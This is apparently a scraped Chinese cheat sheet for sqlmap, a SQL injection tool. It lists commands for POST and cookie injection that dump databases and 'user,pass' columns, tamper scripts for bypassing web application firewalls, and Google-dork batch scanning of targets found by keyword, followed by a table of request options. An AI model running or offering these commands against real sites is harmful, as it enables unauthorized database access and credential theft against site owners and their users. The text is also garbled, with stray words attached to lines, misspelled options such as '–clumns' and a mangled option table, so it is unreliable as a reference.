SqlMap post cookie注入小結

sqlmapphp

SqlMap  POST注入html

自動檢測
sqlmap -u 「http://www.xxx.com/news?id=1″ –smart –level 3 –users正則表達式

單個注入
sqlmap -u 「http://www.xxx.com/1.php」 –data=」id=1″sql

多個post值注入
sqlmap -u 「http://www.xxx.com/vuln.php」 –data=」query=foobar;id=1″ –param-del=」;」 -f –banner –dbs –userscookie

自動注入
sqlmap -u http://xxxx.xxxx.com/Login.asp –formsdom

導入文件注入
sqlmap -r key.txt 「name,pass」  //不知道  key.txt 的位置post

登陸post註冊測試

sqlmap -u 「http://www.xxx.com/vuln.php」 –data=」query=foobar;id=1″ –param-del=」;」 –cookies=」登陸成功的cookie信息」 -f –banner –dbs –users編碼

SqlMap COOkie 注入url

單個注入
sqlmap 「http://127.0.0.1/base.php」 –cookie 「id=1″  –dbs –level 2
sqlmap -u 「url」 –cookie 「id=」 –clumns -T 表段 –level 2
sqlmap -u 「url」 –cookie 「id=」 –dump -T 表段 -C 「user,pass」 –level 2

僞靜態注入:

sqlmap -u url/x*.html –dbs

請求延時注入:
sqlmap –dbs -u usr/x*.html –delay 1(時間,可隨意)
sqlmap –dbs -u usr/x*.html –safe-freq 1(次數,可隨意)
————————————————————————–

繞過WAF防火牆:
sqlmap -u url -v 3 –dbs –batch –tamper 「space2morehash.py」
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–

Google批量檢測注入:
sqlmap -g 關鍵詞

 

Request(請求)::
這些選項能夠用來指定如何鏈接到目標URL。

–data=DATA         經過POST發送的數據字符串–cookie=COOKIE     HTTP Cookie頭–cookie-urlencode  URL 編碼生成的cookie注入–drop-set-cookie   忽略響應的Set – Cookie頭信息–user-agent=AGENT  指定  HTTP User – Agent頭–random-agent      使用隨機選定的HTTP User – Agent頭–referer=REFERER   指定  HTTP Referer頭–headers=HEADERS   換行分開,加入其餘的HTTP頭–auth-type=ATYPE   HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)–auth-cred=ACRED   HTTP身份驗證憑據(用戶名:密碼)–auth-cert=ACERT   HTTP認證證書(key_file,cert_file)–proxy=PROXY       使用HTTP代理鏈接到目標URL–proxy-cred=PCRED  HTTP代理身份驗證憑據(用戶名:密碼)–ignore-proxy      忽略系統默認的HTTP代理–delay=DELAY       在每一個HTTP請求之間的延遲時間,單位爲秒–timeout=TIMEOUT   等待鏈接超時的時間(默認爲30秒)–retries=RETRIES   鏈接超時後從新鏈接的時間(默認3)–scope=SCOPE       從所提供的代理日誌中過濾器目標的正則表達式–safe-url=SAFURL   在測試過程當中常常訪問的url地址

相關文章
相關標籤/搜索